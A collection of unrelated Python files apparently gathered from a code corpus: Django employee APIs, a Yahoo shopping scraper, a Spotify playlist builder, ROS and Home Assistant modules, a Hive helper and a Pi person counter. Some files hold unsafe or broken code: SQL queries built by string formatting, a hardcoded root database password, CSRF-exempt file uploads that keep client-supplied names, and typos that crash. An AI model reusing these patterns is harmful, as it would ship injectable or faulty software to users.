from django.views.decorators.csrf import csrf_exempt
from rest_framework.parsers import JSONParser
from django.http.response import JsonResponse
from EmployeeApp.models import Departments, Employees
from EmployeeApp.serializers import DepartmentSerializer, EmployeeSerializer
from django.core.files.storage import default_storage
# Create your views here.
@csrf_exempt
def departmentApi(request, id = 0):
if request.method == 'GET':
departments = Departments.objects.all()
departments_serializer = DepartmentSerializer(departments, many=True)
return JsonResponse(departments_serializer.data, safe=False)
elif request.method == 'POST':
department_data = JSONParser().parse(request)
departments_serializer = DepartmentSerializer(data = department_data)
if departments_serializer.is_valid():
departments_serializer.save()
return JsonResponse("Added record successfully => " + departments_serializer.data, safe = False)
return JsonResponse("Error adding record to database!", safe=False)
elif request.method == 'PUT':
department_data = JSONParser().parse(request)
department = Departments.objects.get(DepartmentId=department_data['DepartmentId'])
departments_serializer = DepartmentSerializer(deparment, data = department_data)
if departments_serializer.is_valid():
departments_serializer.save()
return JsonResponse("Added record successfully!", safe = False)
return JsonResponse("Error Editing record!", safe = False)
elif request.method == 'DELETE':
department = Departments.objects.get(DepartmentId = id)
department.delete()
return JsonResponse("Deleted record successfully!", safe = False)
# employees
@csrf_exempt
def employeeApi(request, id = 0):
if request.method == 'GET':
employees = Employees.objects.all()
employees_serializer = EmployeeSerializer(employees, many=True)
return JsonResponse(employees_serializer.data, safe=False)
elif request.method == 'POST':
employee_data = JSONParser().parse(request)
employees_serializer = EmployeeSerializer(data = employee_data)
if employees_serializer.is_valid():
employees_serializer.save()
return JsonResponse("Added record successfully => " + employees_serializer.data, safe = False)
return JsonResponse("Error adding record to database!", safe=False)
elif request.method == 'PUT':
employee_data = JSONParser().parse(request)
employee = Employees.objects.get(EmployeeId=employee_data['employeeId'])
employees_serializer = EmployeeSerializer(employee, data = employee_data)
if employees_serializer.is_valid():
employees_serializer.save()
return JsonResponse("Added record successfully!", safe = False)
return JsonResponse("Error Editing record!", safe = False)
elif request.method == 'DELETE':
employee = employees.objects.get(employeeId = id)
Employee.delete()
return JsonResponse("Deleted record successfully!", safe = False)
@csrf_exempt
def save_file(request):
file = request.FILES['file']
file_name = default_storage.save(file.name, file)
return JsonResponse(file_name, safe = False)
|
"""Amavis frontend default settings."""
DATABASE_ROUTERS = ["modoboa_amavis.dbrouter.AmavisRouter"]
SILENCED_SYSTEM_CHECKS = ["fields.W342", ]
|
import regex as re
from functools import reduce
PATTERN = re.compile(r'((\d)\2+)')
def read_data(file_name):
file_ref = open('../../resources/' + file_name, 'r')
result = file_ref.read()
file_ref.close()
return result
def run():
data = read_data('day1.txt')
matches = PATTERN.findall(data)
result = reduce(lambda a, b: a + b, [int(match[0]) * (len(match) - 1) for match, _ in matches])
result += int(data[0]) if data[-1] == data[0] else 0
return result
def run_2():
data = read_data('day1.txt')
loop_limit = len(data)//2
return 2 * reduce(lambda a, b: a + b, [int(x) for i, x in enumerate(data) if i < loop_limit and x == data[loop_limit + i]])
if __name__ == '__main__':
print(run())
print(run_2())
|
# Returns a match for any digit between 0 and 9
import re
txt = "8 times before 11:45 AM"
#Check if the string has any digits:
x = re.findall("[0-9]", txt)
print(x)
if x:
print("Yes, there is at least one match!")
else:
print("No match")
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import requests
from bs4 import BeautifulSoup
import pymysql
conn = pymysql.connect(host='localhost',user='root',password='123456789',database='lcc',charset='utf8')
cursor = conn.cursor()
url = 'https://tw.buy.yahoo.com/category/4385994'
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'}
key = input('請輸入NB品牌:')
param = {'flt':'品牌_'+key}
content = requests.get(url,headers = header, params = param).text
soup = BeautifulSoup(content,'html.parser')
nb = soup.find_all('li',class_='BaseGridItem__grid___2wuJ7 BaseGridItem__multipleImage___37M7b')
#print(nb[0])
for row in nb:
link = row.find('a').get('href')
img = row.find('img').get('srcset')
firstimg = img.split(',')
nbimg = firstimg[0].split()
values = list(row.stripped_strings)#只剩下裡面的字串
price = values[1].replace('$','')#去除$
price = price.replace(',','')#去除,變成整數以後可以價格比較
if values[0] !='補貨中':#老師經驗談 把補貨中的商品拿掉 才不會出錯
sql = "select * from store where webname='Yahoo' and title='{}'".format(values[0])
cursor.execute(sql)
if cursor.rowcount == 0:
sql="insert into store (webname,title,price,link,photo_url) values('Yahoo','{}',{},'{}','{}')".format(values[0],price,link,nbimg[0])
cursor.execute(sql)
conn.commit()
print('產品:',values[0])
print('價格:',price)
print('連結:',link)
print('圖片:',nbimg[0])
print()
cursor.close()
conn.close()
|
#Reversing a string in python
import sys
#take input string from user
ip_string = input()
op_string = ip_string[::-1]
print(op_string)
|
import urllib
import json
response = urllib.urlopen(
"http://search.twitter.com/search.json?q=microsoft"
)
pyresponse = json.load(response, encoding="utf-8")
# type(pyresponse) = 'dict' This denotes it as a dictionary where
# results can be obtained using something like pyresponse.keys() which
# will give a list of the keys in the pyresponse dictionary
print "pyresponse is a " + str(type(pyresponse))
print "the pyresponse keys are " + str(pyresponse.keys())
print ''
# pyresults is a list of dictionary keys
pyresults = pyresponse["results"]
print pyresults[0]['text']
for i in range(10):
print pyresults[i]['text']
|
import googleapiclient.discovery
import json
import youtube_dl
from secret import spotify_id, spotify_token, api_key
from urllib.parse import urlparse, parse_qs
import requests
class CreatePlaylist:
def __init__(self):
self.user_id = spotify_id
self.spotify_token = spotify_token
self.api_key = api_key
self.url = "https://www.youtube.com/watch?v=dY0MYPogyDs&list=PLilMZ_AoO7FsA07dzE7M9N0LkUIGX8-eH"
self.song_info = {}
self.cannot_find = {}
# Gets the songs from youtube playlist
def get_youtube_playlist(self):
# Get the id of the url link
query = parse_qs(urlparse(self.url).query, keep_blank_values=True)
playlist_id = query["list"][0]
print(playlist_id)
youtube = googleapiclient.discovery.build("youtube", "v3", developerKey=self.api_key)
request = youtube.playlistItems().list(
part="snippet",
playlistId=playlist_id,
maxResults=50
)
response = request.execute()
playlist_items = []
while request is not None:
response = request.execute()
playlist_items += response["items"]
request = youtube.playlistItems().list_next(request, response)
for song in playlist_items:
link = 'https://www.youtube.com/watch?v={}'.format(song["snippet"]["resourceId"]["videoId"])
try:
video = youtube_dl.YoutubeDL({}).extract_info(link, download=False)
try:
name = video["track"]
artist = video["artist"]
self.song_info[song["snippet"]["title"]] = {
"url": link,
"song_name": name,
"artist": artist,
"spotify_uri": self.get_spotify_link(artist, name)
}
except KeyError:
self.cannot_find[song["snippet"]["title"]] = {
"url": link
}
except:
self.cannot_find[song["snippet"]["title"]] = {
"url": link
}
# Gets the spotify link for songs using title and artist
def get_spotify_link(self, artist, song_name):
query = "https://api.spotify.com/v1/search?q=track:{}%20artist:{}&type=track&limit=10&offset=0".format(
song_name,
artist
)
response = requests.get(
query,
headers={
"Content-Type": "application/json",
"Authorization": "Bearer {}".format(self.spotify_token)
}
)
response_json = response.json()
songs = response_json["tracks"]["items"]
# This will return the first track in the list of possible tracks
return songs[0]["uri"]
# Creates new spotify playlist
def create_playlist(self):
request_data = json.dumps({
"name": "New Playlist",
"description": "New playlist description",
"public": True
})
query = "https://api.spotify.com/v1/users/{}/playlists".format(self.user_id)
response = requests.post(
query,
data=request_data,
headers={
"Content-Type": "application/json",
"Authorization": "Bearer {}".format(self.spotify_token)
}
)
response_json = response.json()
return response_json["id"]
# Adds songs to playlist
def add_songs(self):
self.get_youtube_playlist()
uris = []
for song,info in self.song_info.items():
uris.append(info["spotify_uri"])
playlist_id = self.create_playlist()
request_data = json.dumps(uris)
query = "https://api.spotify.com/v1/playlists/{}/tracks".format(playlist_id)
response = requests.post(
query,
data=request_data,
headers={
"Content-Type": "application/json",
"Authorization": "Bearer {}".format(self.spotify_token)
}
)
response_json = response.json()
return response_json
|
#!/usr/bin/env python
import rospy
from std_msgs.msg import String
from sensor_msgs.msg import NavSatFix
import math
def callback(msg):
rospy.loginfo( "Input position: [%f,%f, %f]", msg.latitude, msg.longitude,msg.altitude)
#fixed values
a = 6378137;
b = 6356752.3142;
f = (a - b) / a;
e_sq = f * (2-f);
deg_to_rad = 0.0174533;
# input data from msg
latitude = msg.latitude;
longitude = msg.longitude;
h = msg.altitude;
# fixed position
latitude_init = 45.6311926152;
longitude_init = 9.2947495255;
h0 = 231.506675163;
#lla to ecef
lamb = math.radians(latitude)
phi = math.radians(longitude)
s = math.sin(lamb)
N = a / math.sqrt(1 - e_sq * s * s)
sin_lambda = math.sin(lamb)
cos_lambda = math.cos(lamb)
sin_phi = math.sin(phi)
cos_phi = math.cos(phi)
x = (h + N) * cos_lambda * cos_phi
y = (h + N) * cos_lambda * sin_phi
z = (h + (1 - e_sq) * N) * sin_lambda
rospy.loginfo( "ECEF position: [%f,%f, %f]", x, y,z)
#ecef to enu
lamb = math.radians(latitude_init)
phi = math.radians(longitude_init)
s = math.sin(lamb)
N = a / math.sqrt(1 - e_sq * s * s)
sin_lambda = math.sin(lamb)
cos_lambda = math.cos(lamb)
sin_phi = math.sin(phi)
cos_phi = math.cos(phi)
x0 = (h0 + N) * cos_lambda * cos_phi
y0 = (h0 + N) * cos_lambda * sin_phi
z0 = (h0 + (1 - e_sq) * N) * sin_lambda
xd = x - x0
yd = y - y0
zd = z - z0
xEast = -sin_phi * xd + cos_phi * yd
yNorth = -cos_phi * sin_lambda * xd - sin_lambda * sin_phi * yd + cos_lambda * zd
zUp = cos_lambda * cos_phi * xd + cos_lambda * sin_phi * yd + sin_lambda * zd
rospy.loginfo( "ENU position: [%f,%f, %f]", xEast, yNorth,zUp)
def lla2enu():
rospy.init_node('lla2enu', anonymous=True)
rospy.Subscriber("/swiftnav/front/gps_pose", NavSatFix, callback)
rospy.spin()
if __name__ == '__main__':
lla2enu()
|
"""Module for SIA Alarm Control Panels."""
import logging
from homeassistant.core import callback
from homeassistant.helpers.entity import generate_entity_id
from homeassistant.helpers.event import async_track_point_in_utc_time
from homeassistant.helpers.restore_state import RestoreEntity
from homeassistant.components.alarm_control_panel import AlarmControlPanel
from homeassistant.util.dt import utcnow
from . import (
ALARM_FORMAT,
CONF_PING_INTERVAL,
CONF_ZONE,
PING_INTERVAL_MARGIN,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_CUSTOM_BYPASS,
STATE_ALARM_ARMED_NIGHT,
STATE_ALARM_DISARMED,
STATE_ALARM_TRIGGERED,
)
DOMAIN = "sia"
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Implementation of platform setup from HA."""
devices = [
device
for hub in hass.data[DOMAIN].values()
for device in hub._states.values()
if isinstance(device, SIAAlarmControlPanel)
]
_LOGGER.debug("SIAAlarmControlPanel: setup: devices: " + str(devices))
async_add_entities(devices)
class SIAAlarmControlPanel(AlarmControlPanel, RestoreEntity):
"""Class for SIA Alarm Control Panels."""
def __init__(self, entity_id, name, device_class, zone, ping_interval, hass):
_LOGGER.debug(
"SIAAlarmControlPanel: init: Initializing SIA Alarm Control Panel: "
+ entity_id
)
self._should_poll = False
self._entity_id = generate_entity_id(
entity_id_format=ALARM_FORMAT, name=entity_id, hass=hass
)
self._name = name
self.hass = hass
self._ping_interval = ping_interval
self._attr = {CONF_PING_INTERVAL: self.ping_interval, CONF_ZONE: zone}
self._is_available = True
self._remove_unavailability_tracker = None
self._state = STATE_ALARM_DISARMED
async def async_added_to_hass(self):
"""Once the panel is added, see if it was there before and pull in that state."""
await super().async_added_to_hass()
state = await self.async_get_last_state()
if state is not None and state.state is not None:
_LOGGER.debug("SIAAlarmControlPanel: init: old state: " + state.state)
if state.state == STATE_ALARM_ARMED_AWAY:
self.state = STATE_ALARM_ARMED_AWAY
elif state.state == STATE_ALARM_ARMED_NIGHT:
self.state = STATE_ALARM_ARMED_NIGHT
elif state.state == STATE_ALARM_TRIGGERED:
self.state = STATE_ALARM_TRIGGERED
elif state.state == STATE_ALARM_DISARMED:
self.state = STATE_ALARM_DISARMED
elif state.state == STATE_ALARM_ARMED_CUSTOM_BYPASS:
self.state = STATE_ALARM_ARMED_CUSTOM_BYPASS
else:
self.state = None
else:
self.state = STATE_ALARM_DISARMED # assume disarmed
_LOGGER.debug("SIAAlarmControlPanel: added: state: " + str(state))
self._async_track_unavailable()
# async_dispatcher_connect(
# self._hass, DATA_UPDATED, self._schedule_immediate_update
# )
@property
def entity_id(self):
"""Get entity_id."""
return self._entity_id
@property
def name(self):
"""Get Name."""
return self._name
@property
def ping_interval(self):
"""Get ping_interval."""
return str(self._ping_interval)
@property
def state(self):
"""Get state."""
return self._state
@property
def unique_id(self) -> str:
"""Get unique_id."""
return self._name
@property
def available(self):
"""Get availability."""
return self._is_available
def alarm_disarm(self, code=None):
"""Method for disarming, not implemented."""
_LOGGER.debug("Not implemented.")
def alarm_arm_home(self, code=None):
"""Method for arming, not implemented."""
_LOGGER.debug("Not implemented.")
def alarm_arm_away(self, code=None):
"""Method for arming, not implemented."""
_LOGGER.debug("Not implemented.")
def alarm_arm_night(self, code=None):
"""Method for arming, not implemented."""
_LOGGER.debug("Not implemented.")
def alarm_trigger(self, code=None):
"""Method for triggering, not implemented."""
_LOGGER.debug("Not implemented.")
def alarm_arm_custom_bypass(self, code=None):
"""Method for arming, not implemented."""
_LOGGER.debug("Not implemented.")
@property
def device_state_attributes(self):
return self._attr
@state.setter
def state(self, state):
self._state = state
self.async_schedule_update_ha_state()
def assume_available(self):
"""Reset unavalability tracker."""
self._async_track_unavailable()
@callback
def _async_track_unavailable(self):
"""Callback method for resetting unavailability."""
if self._remove_unavailability_tracker:
self._remove_unavailability_tracker()
self._remove_unavailability_tracker = async_track_point_in_utc_time(
self.hass,
self._async_set_unavailable,
utcnow() + self._ping_interval + PING_INTERVAL_MARGIN,
)
if not self._is_available:
self._is_available = True
return True
return False
@callback
def _async_set_unavailable(self, now):
self._remove_unavailability_tracker = None
self._is_available = False
self.async_schedule_update_ha_state()
|
from dataclasses import dataclass
import logging
import jaydebeapi
from tabulate import tabulate
HIVE_DRIVER_CLASSPATH = "org.apache.hive.jdbc.HiveDriver"
DEFAULT_LOGGING_FORMAT = '%(asctime)s :: %(levelname)s :: %(module)s :: %(message)s'
@dataclass
class QueryResult:
columns: list
rows: list
def __table__(self):
return tabulate(self.rows, headers=self.columns, tablefmt='orgtbl')
def __flat__(self):
return '\n'.join([x[0] for x in self.rows])
def build_results(raw_columns, raw_rows):
columns = []
rows = []
for col in raw_columns:
columns.append(str(col[0]))
if len(raw_rows) > 0:
for row in raw_rows:
rows.append(list(row))
return QueryResult(columns=columns, rows=rows)
@dataclass
class HiveHelperOptions:
host: str
port: str
user: str
password: str
hive_jar: str
schema: str
class HiveHelper:
def __init__(self, database: str, opts: HiveHelperOptions = None, logger=None):
self._host = opts.host
self._port = opts.port
self._user = opts.user
self._password = opts.password
self._hive_jar = opts.hive_jar
self._database = database
self._schema = opts.schema
self._conn: jaydebeapi.Connection = None
self._curs: jaydebeapi.Cursor = None
self._active = False
if not logger:
logging.basicConfig(level=logging.INFO, format=DEFAULT_LOGGING_FORMAT)
self.logger = logging.getLogger()
else:
self.logger = logger
def _build_connection(self):
return {
'jclassname': HIVE_DRIVER_CLASSPATH,
'url': self._build_url(),
'driver_args': {'user': self._user, 'password': self._password},
'jars': self._hive_jar,
}
def _build_url(self):
return f"jdbc:hive2://{self._host}:{self._port}/{self._database};{self._schema}"
def set_database(self, database):
old_database = self._database
self._database = database
if self._active:
self.disconnect()
self.connect()
self.logger.info(f"Changed active database from [{old_database}] to"
f" [{self._database}]")
def disconnect(self):
if not self._active:
return
if self._curs:
self._curs.close()
if self._conn:
self._conn.close()
self._active = False
self.logger.info(f"Disconnected from database [{self._database}]")
def connect(self):
self._conn = jaydebeapi.connect(**self._build_connection())
self._curs = self._conn.cursor()
self._active = True
self.logger.info(f"Connected to database [{self._database}]")
def run_query(self, sql):
self._curs.execute(sql)
raw_results = self._curs.fetchall()
return build_results(self._curs.description, raw_results)
def run_statement(self, sql):
self._curs.execute(sql)
return f"{self._curs.rowcount} rows affected"
def get_partitions(self, table_name):
partition_names = []
if not self._active:
raise jaydebeapi.OperationalError("HiveHelper has no active connection(s)")
partitions_results = self.run_query(f"show partitions {table_name}")
raw_partitions = [x[0] for x in partitions_results.rows]
if not raw_partitions:
return []
parts = raw_partitions[0].split("/")
for part in parts:
part_name, part_val = part.split("=")
partition_names.append(part_name)
return partition_names
def get_tables(self, filter=None):
if not self._active:
raise jaydebeapi.OperationalError("HiveHelper has no active connection(s)")
partitions_results = self.run_query("show tables")
if filter:
tables = [x[0] for x in partitions_results.rows if x[0].find(filter) != -1]
else:
tables = [x[0] for x in partitions_results.rows]
if not tables:
return []
return tables
|
# Rename a Directory
import os
print(os.getcwd())
os.mkdir('new_child')
print('Created new_child dir')
print(os.listdir())
os.rename('new_child', 'old_child')
print('Renamed new_child as old_child')
print(os.listdir())
|
from math import factorial
class factor:
def factorial(n):
if n == 0:
return 1
elif n < 0:
return "number is in negative can't do factorial"
else:
return (n * (factorial(n - 1)))
print(factorial(5))
if __name__=='__main__':
calling=factor();
output=calling.factorial(5)
print(output) |
'''
Created on Jun 12, 2020
@author: Poshan
'''
class Lambda1:
def useLambdaFunctions(self):
x = lambda givenNo : givenNo + 15
y = lambda a,b : a * b
print(x(10))
print(y(10,20))
obj = Lambda1()
obj.useLambdaFunctions() |
"""WPSClient Class.
The :class:`WPSClient` class aims to make working with WPS servers easy,
even without any prior knowledge of WPS.
Calling the :class:`WPSClient` class creates an instance whose methods call
WPS processes. These methods are generated at runtime based on the
process description provided by the WPS server. Calling a function sends
an `execute` request to the server. The server response is parsed and
returned as a :class:`WPSExecution` instance, which includes information
about the job status, the progress percentage, the starting time, etc. The
actual output from the process are obtained by calling the `get` method.
The output is parsed to convert the outputs in native Python whenever possible.
`LiteralOutput` objects (string, float, integer, boolean) are automatically
converted to their native format. For `ComplexOutput`, the module can either
return a link to the output files stored on the server, or try to
convert the outputs to a Python object based on their mime type. This conversion
will occur with `get(asobj=True)`. So for example, if the mime type is
'application/json', the output would be a `dict`.
Inputs to processes can be native Python types (string, float, int, date, datetime),
http links or local files. Local files can be transferred to a remote server by
including their content into the WPS request. Simply set the input to a valid path
or file object and the client will take care of reading and converting the file.
Example
-------
If a WPS server with a simple `hello` process is running on the local host on port 5000::
>>> from birdy import WPSClient
>>> emu = WPSClient('http://localhost:5000/')
>>> emu.hello
<bound method hello of <birdy.client.base.WPSClient object>>
>>> print(emu.hello.__doc__)
# Just says a friendly Hello. Returns a literal string output with Hello plus the inputed name.
# Parameters
# ----------
# name : string
# Please enter your name.
#
# Returns
# -------
# output : string
# A friendly Hello from us.
#
# ""
#
# # Call the function. The output is a namedtuple
# >>> emu.hello('stranger')
# hello(output='Hello stranger')
Authentication
--------------
If you want to connect to a server that requires authentication, the
:class:`WPSClient` class accepts an `auth` argument that
behaves exactly like in the popular `requests` module
(see `requests Authentication`_)
The simplest form of authentication is HTTP Basic Auth. Although
wps processes are not commonly protected by this authentication method,
here is a simple example of how to use it::
>>> from birdy import WPSClient
>>> from requests.auth import HTTPBasicAuth
>>> auth = HTTPBasicAuth('user', 'pass')
>>> wps = WPSClient('http://www.example.com/wps', auth=auth)
Because any `requests`-compatible class is accepted, custom
authentication methods are implemented the same way as in `requests`.
For example, to connect to a magpie_ protected wps, you can use the
requests-magpie_ module::
>>> from birdy import WPSClient
>>> from requests_magpie import MagpieAuth
>>> auth = MagpieAuth('https://www.example.com/magpie', 'user', 'pass')
>>> wps = WPSClient('http://www.example.com/wps', auth=auth)
Output format
-------------
Birdy automatically manages process output to reflect it's default values or
Birdy's own defaults.
However, it's possible to customize the output of a process. Each process has an input
named ``output_formats`, that takes a dictionary as a parameter::
# example format = {
# 'output_identifier': {
# 'as_ref': <True, False or None>
# 'mimetype': <MIME type as a string or None>,
# },
# }
# A dictionary defining netcdf and json outputs
>>> custom_format = {
>>> 'netcdf': {
>>> 'as_ref': True,
>>> 'mimetype': 'application/json',
>>> },
>>> 'json': {
>>> 'as_ref': False,
>>> 'mimetype': None
>>> }
>>> }
Utility functions can also be used to create this dictionary::
>>> custom_format = create_output_dictionary('netcdf', True, 'application/json')
>>> add_output_format(custom_format, 'json', False, None)
The created dictionary can then be used with a process::
>>> cli = WPSClient("http://localhost:5000")
>>> z = cli.output_formats(output_formats=custom_format).get()
>>> z
.. _requests Authentication: https://2.python-requests.org/en/master/user/authentication/
.. _magpie: https://github.com/ouranosinc/magpie
.. _requests-magpie: https://github.com/ouranosinc/requests-magpie
"""
from birdy.client.notebook import gui # noqa: F401
from .base import WPSClient, nb_form # noqa: F401
|
'''
@author :kpkishankrishna
Write a piece of Python code that prints out the string
'hello world' if the value of an integer variable,
happy, is strictly greater than 2.
'''
HAPPY = int(input())
if HAPPY > 2:
print("hello world")
|
######## Picamera Object Detection Using Tensorflow Classifier #########
#
# Author: Evan Juras
# Date: 4/15/18
# Description:
# This program uses a TensorFlow classifier to perform object detection.
# It loads the classifier uses it to perform object detection on a Picamera feed.
# It draws boxes and scores around the objects of interest in each frame from
# the Picamera. It also can be used with a webcam by adding "--usbcam"
# when executing this script from the terminal.
## Some of the code is copied from Google's example at
## https://github.com/tensorflow/models/blob/master/research/object_detection/object_detection_tutorial.ipynb
## and some is copied from Dat Tran's example at
## https://github.com/datitran/object_detector_app/blob/master/object_detection_app.py
## but I changed it to make it more understandable to me.
# Import packages
import os
import cv2
import numpy as np
from picamera.array import PiRGBArray
from picamera import PiCamera
import tensorflow as tf
import argparse
import sys
import csv
import datetime
def csv_write(file_name, rights, counter, data):
with open(file_name, rights, newline='') as f:
fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
thewriter = csv.DictWriter(f, fieldnames = fields)
counter
thewriter.writerow(data)
return;
def erase_csv(file_name):
f = open(file_name, "w")
f.truncate()
f.close()
##MICROSECONDS = currentDT.microsecond
#All the logs to bve initially stored
with open('person_log.csv', 'w', newline='') as f:
fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
thewriter = csv.DictWriter(f, fieldnames = fields)
thewriter.writeheader()
#Minute averaged data to be stored here
with open('minute_logs.csv', 'w', newline='') as f:
fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
thewriter = csv.DictWriter(f, fieldnames = fields)
thewriter.writeheader()
with open('hour_logs.csv', 'w', newline='') as f:
fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
thewriter = csv.DictWriter(f, fieldnames = fields)
thewriter.writeheader()
#All days data to be represented to be shown here.
with open('day_logs.csv', 'w', newline='') as f:
fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
thewriter = csv.DictWriter(f, fieldnames = fields)
thewriter.writeheader()
#All weeks data to be logged here
with open('week_logs.csv', 'w', newline='') as f:
fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
thewriter = csv.DictWriter(f, fieldnames = fields)
thewriter.writeheader()
csv_counter = 0
second_counter = 0
minute_counter = 0
hour_counter = 0
day_counter = 0
month_counter = 0
HOUR_FLAG = 0
MINUTE_FLAG = 0
DAY_FLAG = 0
MONTH_FLAG = 0
# Set up camera constants
IM_WIDTH = 1280
IM_HEIGHT = 720
#IM_WIDTH = 640 Use smaller resolution for
#IM_HEIGHT = 480 slightly faster framerate
# Select camera type (if user enters --usbcam when calling this script,
# a USB webcam will be used)
camera_type = 'picamera'
parser = argparse.ArgumentParser()
parser.add_argument('--usbcam', help='Use a USB webcam instead of picamera',
action='store_true')
args = parser.parse_args()
if args.usbcam:
camera_type = 'usb'
# This is needed since the working directory is the object_detection folder.
sys.path.append('..')
# Import utilites
from utils import label_map_util
from utils import visualization_utils as vis_util
# Name of the directory containing the object detection module we're using
MODEL_NAME = 'ssdlite_mobilenet_v2_coco_2018_05_09'
# Grab path to current working directory
CWD_PATH = os.getcwd()
# Path to frozen detection graph .pb file, which contains the model that is used
# for object detection.
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,'frozen_inference_graph.pb')
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,'data','mscoco_label_map.pbtxt')
# Number of classes the object detector can identify
NUM_CLASSES = 90
## Load the label map.
# Label maps map indices to category names, so that when the convolution
# network predicts `5`, we know that this corresponds to `airplane`.
# Here we use internal utility functions, but anything that returns a
# dictionary mapping integers to appropriate string labels would be fine
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load the Tensorflow model into memory.
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
# Define input and output tensors (i.e. data) for the object detection classifier
# Input tensor is the image
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Output tensors are the detection boxes, scores, and classes
# Each box represents a part of the image where a particular object was detected
detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represents level of confidence for each of the objects.
# The score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
# Number of objects detected
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# Initialize frame rate calculation
frame_rate_calc = 2
freq = cv2.getTickFrequency()
font = cv2.FONT_HERSHEY_SIMPLEX
# Initialize camera and perform object detection.
# The camera has to be set up and used differently depending on if it's a
# Picamera or USB webcam.
# I know this is ugly, but I basically copy+pasted the code for the object
# detection loop twice, and made one work for Picamera and the other work
# for USB.
### Picamera ###
if camera_type == 'picamera':
# Initialize Picamera and grab reference to the raw capture
camera = PiCamera()
camera.resolution = (IM_WIDTH,IM_HEIGHT)
camera.framerate = 20
rawCapture = PiRGBArray(camera, size=(IM_WIDTH,IM_HEIGHT))
rawCapture.truncate(0)
for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):
t1 = cv2.getTickCount()
# Acquire frame and expand frame dimensions to have shape: [1, None, None, 3]
# i.e. a single-column array, where each item in the column has the pixel RGB value
frame = np.copy(frame1.array)
frame.setflags(write=1)
frame_expanded = np.expand_dims(frame, axis=0)
# Perform the actual detection by running the model with the image as input
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores, detection_classes, num_detections],
feed_dict={image_tensor: frame_expanded})
number_of_objects = int(num[0])
classes_without_person = classes[np.nonzero(classes>1.00)]
number_of_classes = len(classes_without_person)
number_of_persons = number_of_objects - number_of_classes
#print("Original: ")
#print(classes)
#print('\n\r')
print("Number of People in the Room: ")
print(number_of_persons)
print('\n\r')
currentDT = datetime.datetime.now() #updating the current time
#fetching all the Time values
YEAR = currentDT.year
MONTH = currentDT.month
DATE = currentDT.day
HOUR = currentDT.hour
MINUTES = currentDT.minute
SECONDS = currentDT.second
#setting flags as to decide when to start or stop updates
if(MINUTE_FLAG == 0):
minute_temp = int(MINUTES)
print("into_minute_flg")
MINUTE_FLAG = 1
second_counter = 0
if(HOUR_FLAG == 0):
hour_temp = int(HOUR)
print("into_hour_flg")
HOUR_FLAG = 1
if(DAY_FLAG == 0):
day_temp = int(DATE)
print("into_daye_flg")
DAY_FLAG = 1
# putting everything in the person logger . It can store data upto 6 hours
with open('person_log.csv', 'a', newline='') as f:
fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
thewriter = csv.DictWriter(f, fieldnames = fields)
csv_counter = csv_counter + 1
thewriter.writerow({'YEAR': str(YEAR), 'MONTH': str(MONTH), 'DATE': str(DATE), 'HOUR': str(HOUR), 'MINUTES': str(MINUTES), 'SECONDS':str(SECONDS), 'NUMBER':str(number_of_persons)})
if(csv_counter >= 21600): #entries upto six hours is only stored.
f = open("person_log.csv", "w")
f.truncate()
f.close()
csv_counter = 0
print(csv_counter)
if((minute_temp - MINUTES) == 0):
#updating the csv
with open('minute_logs.csv', 'a', newline='') as f:
fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
thewriter = csv.DictWriter(f, fieldnames = fields)
second_counter = second_counter + 1
thewriter.writerow({'YEAR': str(YEAR), 'MONTH': str(MONTH), 'DATE': str(DATE), 'HOUR': str(HOUR), 'MINUTES': str(MINUTES), 'SECONDS':str(SECONDS), 'NUMBER':str(number_of_persons)})
else:
MINUTE_FLAG = 0
with open("minute_logs.csv", "r") as f:
reader = csv.reader(f)
data = [row for row in reader]
del data[0]
rows = len(data) #this is the way you decide the number of rows in a list
total_entries = rows
columns = len(data[0]) # this is the way to determine the nmumber of columns in the list
add = 0
for i in range(rows):
print("The sum before add is :", add)
add = add + int(data[i][6])
if((int(data[i][6])) == 0):
total_entries = total_entries - 1
#del data[0]
print("The final addition is:", add)
print("The total number of entries are :", total_entries)
if(total_entries):
minutes_average = add/total_entries
else:
minutes_average = 0
minutes_average = int(minutes_average)
csv_write('hour_logs.csv', 'a',hour_counter, {'YEAR': str(YEAR), 'MONTH': str(MONTH), 'DATE': str(DATE), 'HOUR': str(HOUR), 'MINUTES': str(MINUTES), 'SECONDS':str(SECONDS), 'NUMBER':str(minutes_average)})
erase_csv("minute_logs.csv")
if((hour_temp - HOUR) != 0):
HOUR_FLAG = 0
